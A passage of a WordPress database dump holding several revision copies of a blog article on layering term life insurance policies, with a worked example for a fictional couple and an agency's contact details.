style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div></div>\r\n</div>\r\n<div>\r\n\r\n<img class=\"article_image alignright\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder1.png\" alt=\"Term Life Insurance Layering, Chart 1\" width=\"300\" height=\"300\" /><strong>We encourage Larry to layer three term life policies as shown below:</strong>\r\n\r\nInstead of purchasing one term life policy for $1,000,000 for 30 years at a fixed rate, we encourage Larry to purchase three separate term life policies:\r\n<ul>\r\n 	<li>One policy for $500,000 for 10 years</li>\r\n 	<li>One policy for $300,000 for 15 years</li>\r\n 	<li>One policy for $200,000 for 30 years</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div></div>\r\n</div>\r\n<div>\r\n\r\nWhen Larry purchases three separate policies versus one large policy, he saves almost 34%! Let’s see how this is possible.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder2.png\" alt=\"Term Life Insurance Layering, Chart 2\" width=\"300\" height=\"300\" />Term life insurance layering could possibly be a sound investment for some families, especially if their insurance needs decline as they age.\r\n\r\nHowever, the layering strategy could be highly complicated for those just starting out.\r\n\r\nWhen layering your life insurance, we highly recommend getting professional help to guide you through the process and ensure you’re getting the best coverage at the best prices.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Termlifeadvice.com, 2018\r\n</span></em><em><span style=\"font-size: 8pt;\">2. NerdWallet, 2017</span></em>\r\n\r\n</div>','Layering Term Life Insurance Could Save You Money','','inherit','closed','closed','','436-revision-v1','','','2023-03-21 14:14:17','2023-03-21 14:14:17','',436,'http://cmdev-site1.com/?p=444',0,'revision','',0),(445,3,'2023-03-21 14:15:28','2023-03-21 14:15:28','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nOne of the most common questions we hear in the insurance industry is, “How much coverage do I need?”\r\n\r\nWhen it comes to life insurance, there are two different types of policies: whole life and term life. A whole life insurance policy lives as long as you do while a term life insurance policy is active for a certain period of time.\r\n\r\nThe “one size fits all” phrase is not applicable to life insurance—coverage should be customized to where you are in your life. Your insurance needs to change as your life goes on.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Does it Mean to Layer Your Life Insurance Policies?</h3>\r\nLayering, or laddering, is a technique that has become quite popular in the life insurance industry. It occurs when a consumer buys a few different term life policies with different term lengths rather than one whole life policy or one large term life policy.\r\n\r\nIn some instances, the layering technique can save policyholders almost 30%!<sup>1</sup>\r\n\r\nWe see layering policies when consumers have multiple reasons to buy a term life policy such as covering a mortgage, leaving dependents with a benefit, or general coverage for “just in case” purposes.\r\n\r\nLayering life insurance is not recommended for everyone. It may be unjustifiable for a single male in his mid-20s who makes $55,000 a year to take out three term life insurance policies.\r\n\r\nNot only would it be questionable to the insurance company why this person would need so much coverage, but they would also have a concern with his ability to consistently pay all the premiums.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Cons of Layering Your Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Most insurance policies have a few different fees that cover things such as sales charges, mortality, and expense risk charges, monthly per thousand charges, or general administration fees. When you ladder your insurance, you may be subject to paying multiple fees for each policy.</li>\r\n 	<li>While it’s encouraged to get a head start on your coverage needs, if you aren’t sure of your future financial obligations, you could be excessively spending on multiple policies.</li>\r\n 	<li>Having less insurance in your later years could backfire if you need additional money to purchase another house or deal with an emergency.</li>\r\n 	<li>Should your spouse ever need to file a claim, he or she will need to file multiple claims and present a death certificate several times since you would have multiple policies.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Pros of Layering Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Because term life insurance is temporary and typically has no cash value, it can cost three to 10 times less than a whole life insurance policy.<sup>2</sup></li>\r\n 	<li>A term life policy tends to be more transparent because it offers coverage over a set period of time, which consumers pay in previously-defined regular payments. Term life insurance gives you one product that does one thing.</li>\r\n 	<li>Term life policies give the consumer more control over his or her purchased coverage. Additionally, when your financial obligations change as your life goes on, you can customize your coverage to best fit your needs.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Layering Term Life Example</h3>\r\nLet’s see how our fictional friends Larry and Terri layered their term life insurance policies. Larry and Terri are married and in their mid-30s with two young children and a suburban home purchased at $500,000.\r\n\r\nLarry is a successful real estate agent while Terri provides child care for their two young children.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladders-example1.png\" alt=\"Layering Term Life Insurance Could Save You Money | Globe Life\" width=\"300\" height=\"300\" /><span style=\"color: #ffffff;\">-</span>\r\n\r\n<strong>Larry is looking into life insurance and needs:</strong>\r\n<p style=\"padding-left: 360px;\">$500,000 for his mortgage with 10 years left</p>\r\n<p style=\"padding-left: 360px;\">$300,000 for his two children’s college expenses ($150,000 each)</p>\r\n<p style=\"padding-left: 360px;\">$200,000 in the event of his death so Terri will be taken care of</p>\r\n&nbsp;\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div></div>\r\n</div>\r\n<div>\r\n\r\n<img class=\"article_image alignright\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder1.png\" alt=\"Term Life Insurance Layering, Chart 1\" width=\"300\" height=\"300\" /><strong>We encourage Larry to layer three term life policies as shown below:</strong>\r\n\r\nInstead of purchasing one term life policy for $1,000,000 for 30 years at a fixed rate, we encourage Larry to purchase three separate term life policies:\r\n<ul>\r\n 	<li>One policy for $500,000 for 10 years</li>\r\n 	<li>One policy for $300,000 for 15 years</li>\r\n 	<li>One policy for $200,000 for 30 years</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div></div>\r\n</div>\r\n<div>\r\n\r\nWhen Larry purchases three separate policies versus one large policy, he saves almost 34%! Let’s see how this is possible.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder2.png\" alt=\"Term Life Insurance Layering, Chart 2\" width=\"300\" height=\"300\" />Term life insurance layering could possibly be a sound investment for some families, especially if their insurance needs decline as they age.\r\n\r\nHowever, the layering strategy could be highly complicated for those just starting out.\r\n\r\nWhen layering your life insurance, we highly recommend getting professional help to guide you through the process and ensure you’re getting the best coverage at the best prices.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Termlifeadvice.com, 2018\r\n</span></em><em><span style=\"font-size: 8pt;\">2. NerdWallet, 2017</span></em>\r\n\r\n</div>','Layering Term Life Insurance Could Save You Money','','inherit','closed','closed','','436-revision-v1','','','2023-03-21 14:15:28','2023-03-21 14:15:28','',436,'http://cmdev-site1.com/?p=445',0,'revision','',0),(447,3,'2023-03-21 14:16:53','2023-03-21 14:16:53','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nOne of the most common questions we hear in the insurance industry is, “How much coverage do I need?”\r\n\r\nWhen it comes to life insurance, there are two different types of policies: whole life and term life. A whole life insurance policy lives as long as you do while a term life insurance policy is active for a certain period of time.\r\n\r\nThe “one size fits all” phrase is not applicable to life insurance—coverage should be customized to where you are in your life. Your insurance needs to change as your life goes on.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Does it Mean to Layer Your Life Insurance Policies?</h3>\r\nLayering, or laddering, is a technique that has become quite popular in the life insurance industry. It occurs when a consumer buys a few different term life policies with different term lengths rather than one whole life policy or one large term life policy.\r\n\r\nIn some instances, the layering technique can save policyholders almost 30%!<sup>1</sup>\r\n\r\nWe see layering policies when consumers have multiple reasons to buy a term life policy such as covering a mortgage, leaving dependents with a benefit, or general coverage for “just in case” purposes.\r\n\r\nLayering life insurance is not recommended for everyone. It may be unjustifiable for a single male in his mid-20s who makes $55,000 a year to take out three term life insurance policies.\r\n\r\nNot only would it be questionable to the insurance company why this person would need so much coverage, but they would also have a concern with his ability to consistently pay all the premiums.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Cons of Layering Your Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Most insurance policies have a few different fees that cover things such as sales charges, mortality, and expense risk charges, monthly per thousand charges, or general administration fees. When you ladder your insurance, you may be subject to paying multiple fees for each policy.</li>\r\n 	<li>While it’s encouraged to get a head start on your coverage needs, if you aren’t sure of your future financial obligations, you could be excessively spending on multiple policies.</li>\r\n 	<li>Having less insurance in your later years could backfire if you need additional money to purchase another house or deal with an emergency.</li>\r\n 	<li>Should your spouse ever need to file a claim, he or she will need to file multiple claims and present a death certificate several times since you would have multiple policies.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Pros of Layering Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Because term life insurance is temporary and typically has no cash value, it can cost three to 10 times less than a whole life insurance policy.<sup>2</sup></li>\r\n 	<li>A term life policy tends to be more transparent because it offers coverage over a set period of time, which consumers pay in previously-defined regular payments. Term life insurance gives you one product that does one thing.</li>\r\n 	<li>Term life policies give the consumer more control over his or her purchased coverage. Additionally, when your financial obligations change as your life goes on, you can customize your coverage to best fit your needs.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Layering Term Life Example</h3>\r\nLet’s see how our fictional friends Larry and Terri layered their term life insurance policies. Larry and Terri are married and in their mid-30s with two young children and a suburban home purchased at $500,000.\r\n\r\nLarry is a successful real estate agent while Terri provides child care for their two young children.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladders-example1.png\" alt=\"Layering Term Life Insurance Could Save You Money | Globe Life\" width=\"300\" height=\"300\" /><span style=\"color: #ffffff;\">-</span>\r\n\r\n<strong>Larry is looking into life insurance and needs:</strong>\r\n<p style=\"padding-left: 320px;\">• $500,000 for his mortgage with 10 years left\r\n• $300,000 for his two children’s college expenses ($150,000 each)\r\n• $200,000 in the event of his death so Terri will be taken care of</p>\r\n&nbsp;\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n</div>\r\n<div>\r\n\r\n<img class=\"article_image alignright\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder1.png\" alt=\"Term Life Insurance Layering, Chart 1\" width=\"300\" height=\"300\" /><strong>We encourage Larry to layer three term life policies as shown below:</strong>\r\n\r\nInstead of purchasing one term life policy for $1,000,000 for 30 years at a fixed rate, we encourage Larry to purchase three separate term life policies:\r\n<ul>\r\n 	<li>One policy for $500,000 for 10 years</li>\r\n 	<li>One policy for $300,000 for 15 years</li>\r\n 	<li>One policy for $200,000 for 30 years</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div></div>\r\n</div>\r\n<div>\r\n\r\nWhen Larry purchases three separate policies versus one large policy, he saves almost 34%! Let’s see how this is possible.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder2.png\" alt=\"Term Life Insurance Layering, Chart 2\" width=\"300\" height=\"300\" />Term life insurance layering could possibly be a sound investment for some families, especially if their insurance needs decline as they age.\r\n\r\nHowever, the layering strategy could be highly complicated for those just starting out.\r\n\r\nWhen layering your life insurance, we highly recommend getting professional help to guide you through the process and ensure you’re getting the best coverage at the best prices.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Termlifeadvice.com, 2018\r\n</span></em><em><span style=\"font-size: 8pt;\">2. NerdWallet, 2017</span></em>\r\n\r\n</div>','Layering Term Life Insurance Could Save You Money','','inherit','closed','closed','','436-revision-v1','','','2023-03-21 14:16:53','2023-03-21 14:16:53','',436,'http://cmdev-site1.com/?p=447',0,'revision','',0),(448,3,'2023-03-21 14:17:41','2023-03-21 14:17:41','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nOne of the most common questions we hear in the insurance industry is, “How much coverage do I need?”\r\n\r\nWhen it comes to life insurance, there are two different types of policies: whole life and term life. A whole life insurance policy lives as long as you do while a term life insurance policy is active for a certain period of time.\r\n\r\nThe “one size fits all” phrase is not applicable to life insurance—coverage should be customized to where you are in your life. Your insurance needs to change as your life goes on.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Does it Mean to Layer Your Life Insurance Policies?</h3>\r\nLayering, or laddering, is a technique that has become quite popular in the life insurance industry. It occurs when a consumer buys a few different term life policies with different term lengths rather than one whole life policy or one large term life policy.\r\n\r\nIn some instances, the layering technique can save policyholders almost 30%!<sup>1</sup>\r\n\r\nWe see layering policies when consumers have multiple reasons to buy a term life policy such as covering a mortgage, leaving dependents with a benefit, or general coverage for “just in case” purposes.\r\n\r\nLayering life insurance is not recommended for everyone. It may be unjustifiable for a single male in his mid-20s who makes $55,000 a year to take out three term life insurance policies.\r\n\r\nNot only would it be questionable to the insurance company why this person would need so much coverage, but they would also have a concern with his ability to consistently pay all the premiums.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Cons of Layering Your Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Most insurance policies have a few different fees that cover things such as sales charges, mortality, and expense risk charges, monthly per thousand charges, or general administration fees. When you ladder your insurance, you may be subject to paying multiple fees for each policy.</li>\r\n 	<li>While it’s encouraged to get a head start on your coverage needs, if you aren’t sure of your future financial obligations, you could be excessively spending on multiple policies.</li>\r\n 	<li>Having less insurance in your later years could backfire if you need additional money to purchase another house or deal with an emergency.</li>\r\n 	<li>Should your spouse ever need to file a claim, he or she will need to file multiple claims and present a death certificate several times since you would have multiple policies.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Pros of Layering Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Because term life insurance is temporary and typically has no cash value, it can cost three to 10 times less than a whole life insurance policy.<sup>2</sup></li>\r\n 	<li>A term life policy tends to be more transparent because it offers coverage over a set period of time, which consumers pay in previously-defined regular payments. Term life insurance gives you one product that does one thing.</li>\r\n 	<li>Term life policies give the consumer more control over his or her purchased coverage. Additionally, when your financial obligations change as your life goes on, you can customize your coverage to best fit your needs.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Layering Term Life Example</h3>\r\nLet’s see how our fictional friends Larry and Terri layered their term life insurance policies. Larry and Terri are married and in their mid-30s with two young children and a suburban home purchased at $500,000.\r\n\r\nLarry is a successful real estate agent while Terri provides child care for their two young children.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladders-example1.png\" alt=\"Layering Term Life Insurance Could Save You Money | Globe Life\" width=\"300\" height=\"300\" /><span style=\"color: #ffffff;\">-</span>\r\n\r\n<strong>Larry is looking into life insurance and needs:</strong>\r\n<p style=\"padding-left: 320px;\">• $500,000 for his mortgage with 10 years left\r\n• $300,000 for his two children’s college expenses ($150,000 each)\r\n• $200,000 in the event of his death so Terri will be taken care of</p>\r\n&nbsp;\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n</div>\r\n<div>\r\n\r\n<img class=\"article_image alignright\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder1.png\" alt=\"Term Life Insurance Layering, Chart 1\" width=\"300\" height=\"300\" /><strong>We encourage Larry to layer three term life policies as shown below:</strong>\r\n\r\nInstead of purchasing one term life policy for $1,000,000 for 30 years at a fixed rate, we encourage Larry to purchase three separate term life policies:\r\n<ul>\r\n 	<li>One policy for $500,000 for 10 years</li>\r\n 	<li>One policy for $300,000 for 15 years</li>\r\n 	<li>One policy for $200,000 for 30 years</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n</div>\r\n<div>\r\n\r\nWhen Larry purchases three separate policies versus one large policy, he saves almost 34%! Let’s see how this is possible.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder2.png\" alt=\"Term Life Insurance Layering, Chart 2\" width=\"300\" height=\"300\" />Term life insurance layering could possibly be a sound investment for some families, especially if their insurance needs decline as they age.\r\n\r\nHowever, the layering strategy could be highly complicated for those just starting out.\r\n\r\nWhen layering your life insurance, we highly recommend getting professional help to guide you through the process and ensure you’re getting the best coverage at the best prices.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Termlifeadvice.com, 2018\r\n</span></em><em><span style=\"font-size: 8pt;\">2. NerdWallet, 2017</span></em>\r\n\r\n</div>','Layering Term Life Insurance Could Save You Money','','inherit','closed','closed','','436-revision-v1','','','2023-03-21 14:17:41','2023-03-21 14:17:41','',436,'http://cmdev-site1.com/?p=448',0,'revision','',0),(449,3,'2023-03-21 14:18:22','2023-03-21 14:18:22','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nOne of the most common questions we hear in the insurance industry is, “How much coverage do I need?”\r\n\r\nWhen it comes to life insurance, there are two different types of policies: whole life and term life. A whole life insurance policy lives as long as you do while a term life insurance policy is active for a certain period of time.\r\n\r\nThe “one size fits all” phrase is not applicable to life insurance—coverage should be customized to where you are in your life. Your insurance needs to change as your life goes on.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Does it Mean to Layer Your Life Insurance Policies?</h3>\r\nLayering, or laddering, is a technique that has become quite popular in the life insurance industry. It occurs when a consumer buys a few different term life policies with different term lengths rather than one whole life policy or one large term life policy.\r\n\r\nIn some instances, the layering technique can save policyholders almost 30%!<sup>1</sup>\r\n\r\nWe see layering policies when consumers have multiple reasons to buy a term life policy such as covering a mortgage, leaving dependents with a benefit, or general coverage for “just in case” purposes.\r\n\r\nLayering life insurance is not recommended for everyone. It may be unjustifiable for a single male in his mid-20s who makes $55,000 a year to take out three term life insurance policies.\r\n\r\nNot only would it be questionable to the insurance company why this person would need so much coverage, but they would also have a concern with his ability to consistently pay all the premiums.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Cons of Layering Your Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Most insurance policies have a few different fees that cover things such as sales charges, mortality, and expense risk charges, monthly per thousand charges, or general administration fees. When you ladder your insurance, you may be subject to paying multiple fees for each policy.</li>\r\n 	<li>While it’s encouraged to get a head start on your coverage needs, if you aren’t sure of your future financial obligations, you could be excessively spending on multiple policies.</li>\r\n 	<li>Having less insurance in your later years could backfire if you need additional money to purchase another house or deal with an emergency.</li>\r\n 	<li>Should your spouse ever need to file a claim, he or she will need to file multiple claims and present a death certificate several times since you would have multiple policies.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Pros of Layering Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Because term life insurance is temporary and typically has no cash value, it can cost three to 10 times less than a whole life insurance policy.<sup>2</sup></li>\r\n 	<li>A term life policy tends to be more transparent because it offers coverage over a set period of time, which consumers pay in previously-defined regular payments. Term life insurance gives you one product that does one thing.</li>\r\n 	<li>Term life policies give the consumer more control over his or her purchased coverage. Additionally, when your financial obligations change as your life goes on, you can customize your coverage to best fit your needs.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Layering Term Life Example</h3>\r\nLet’s see how our fictional friends Larry and Terri layered their term life insurance policies. Larry and Terri are married and in their mid-30s with two young children and a suburban home purchased at $500,000.\r\n\r\nLarry is a successful real estate agent while Terri provides child care for their two young children.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladders-example1.png\" alt=\"Layering Term Life Insurance Could Save You Money | Globe Life\" width=\"300\" height=\"300\" /><span style=\"color: #ffffff;\">-</span>\r\n\r\n<strong>Larry is looking into life insurance and needs:</strong>\r\n<p style=\"padding-left: 320px;\">• $500,000 for his mortgage with 10 years left\r\n• $300,000 for his two children’s college expenses ($150,000 each)\r\n• $200,000 in the event of his death so Terri will be taken care of</p>\r\n&nbsp;\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n</div>\r\n<div>\r\n\r\n<img class=\"article_image alignright\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder1.png\" alt=\"Term Life Insurance Layering, Chart 1\" width=\"300\" height=\"300\" /><strong>We encourage Larry to layer three term life policies as shown below:</strong>\r\n\r\nInstead of purchasing one term life policy for $1,000,000 for 30 years at a fixed rate, we encourage Larry to purchase three separate term life policies:\r\n<ul>\r\n 	<li>One policy for $500,000 for 10 years</li>\r\n 	<li>One policy for $300,000 for 15 years</li>\r\n 	<li>One policy for $200,000 for 30 years</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n</div>\r\n<div>\r\n\r\nWhen Larry purchases three separate policies versus one large policy, he saves almost 34%! Let’s see how this is possible.\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder2.png\" alt=\"Term Life Insurance Layering, Chart 2\" width=\"300\" height=\"300\" />Term life insurance layering could possibly be a sound investment for some families, especially if their insurance needs decline as they age.\r\n\r\nHowever, the layering strategy could be highly complicated for those just starting out.\r\n\r\nWhen layering your life insurance, we highly recommend getting professional help to guide you through the process and ensure you’re getting the best coverage at the best prices.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Termlifeadvice.com, 2018\r\n</span></em><em><span style=\"font-size: 8pt;\">2. NerdWallet, 2017</span></em>\r\n\r\n</div>','Layering Term Life Insurance Could Save You Money','','inherit','closed','closed','','436-revision-v1','','','2023-03-21 14:18:22','2023-03-21 14:18:22','',436,'http://cmdev-site1.com/?p=449',0,'revision','',0),(450,3,'2023-03-21 14:18:43','2023-03-21 14:18:43','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nOne of the most common questions we hear in the insurance industry is, “How much coverage do I need?”\r\n\r\nWhen it comes to life insurance, there are two different types of policies: whole life and term life. A whole life insurance policy lives as long as you do while a term life insurance policy is active for a certain period of time.\r\n\r\nThe “one size fits all” phrase is not applicable to life insurance—coverage should be customized to where you are in your life. Your insurance needs to change as your life goes on.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Does it Mean to Layer Your Life Insurance Policies?</h3>\r\nLayering, or laddering, is a technique that has become quite popular in the life insurance industry. It occurs when a consumer buys a few different term life policies with different term lengths rather than one whole life policy or one large term life policy.\r\n\r\nIn some instances, the layering technique can save policyholders almost 30%!<sup>1</sup>\r\n\r\nWe see layering policies when consumers have multiple reasons to buy a term life policy such as covering a mortgage, leaving dependents with a benefit, or general coverage for “just in case” purposes.\r\n\r\nLayering life insurance is not recommended for everyone. It may be unjustifiable for a single male in his mid-20s who makes $55,000 a year to take out three term life insurance policies.\r\n\r\nNot only would it be questionable to the insurance company why this person would need so much coverage, but they would also have a concern with his ability to consistently pay all the premiums.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Cons of Layering Your Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Most insurance policies have a few different fees that cover things such as sales charges, mortality, and expense risk charges, monthly per thousand charges, or general administration fees. When you ladder your insurance, you may be subject to paying multiple fees for each policy.</li>\r\n 	<li>While it’s encouraged to get a head start on your coverage needs, if you aren’t sure of your future financial obligations, you could be excessively spending on multiple policies.</li>\r\n 	<li>Having less insurance in your later years could backfire if you need additional money to purchase another house or deal with an emergency.</li>\r\n 	<li>Should your spouse ever need to file a claim, he or she will need to file multiple claims and present a death certificate several times since you would have multiple policies.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Pros of Layering Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Because term life insurance is temporary and typically has no cash value, it can cost three to 10 times less than a whole life insurance policy.<sup>2</sup></li>\r\n 	<li>A term life policy tends to be more transparent because it offers coverage over a set period of time, which consumers pay in previously-defined regular payments. Term life insurance gives you one product that does one thing.</li>\r\n 	<li>Term life policies give the consumer more control over his or her purchased coverage. Additionally, when your financial obligations change as your life goes on, you can customize your coverage to best fit your needs.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Layering Term Life Example</h3>\r\nLet’s see how our fictional friends Larry and Terri layered their term life insurance policies. Larry and Terri are married and in their mid-30s with two young children and a suburban home purchased at $500,000.\r\n\r\nLarry is a successful real estate agent while Terri provides child care for their two young children.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladders-example1.png\" alt=\"Layering Term Life Insurance Could Save You Money | Globe Life\" width=\"300\" height=\"300\" /><span style=\"color: #ffffff;\">-</span>\r\n\r\n<strong>Larry is looking into life insurance and needs:</strong>\r\n<p style=\"padding-left: 320px;\">• $500,000 for his mortgage with 10 years left\r\n• $300,000 for his two children’s college expenses ($150,000 each)\r\n• $200,000 in the event of his death so Terri will be taken care of</p>\r\n&nbsp;\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n</div>\r\n<div>\r\n\r\n<img class=\"article_image alignright\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder1.png\" alt=\"Term Life Insurance Layering, Chart 1\" width=\"300\" height=\"300\" /><strong>We encourage Larry to layer three term life policies as shown below:</strong>\r\n\r\nInstead of purchasing one term life policy for $1,000,000 for 30 years at a fixed rate, we encourage Larry to purchase three separate term life policies:\r\n<ul>\r\n 	<li>One policy for $500,000 for 10 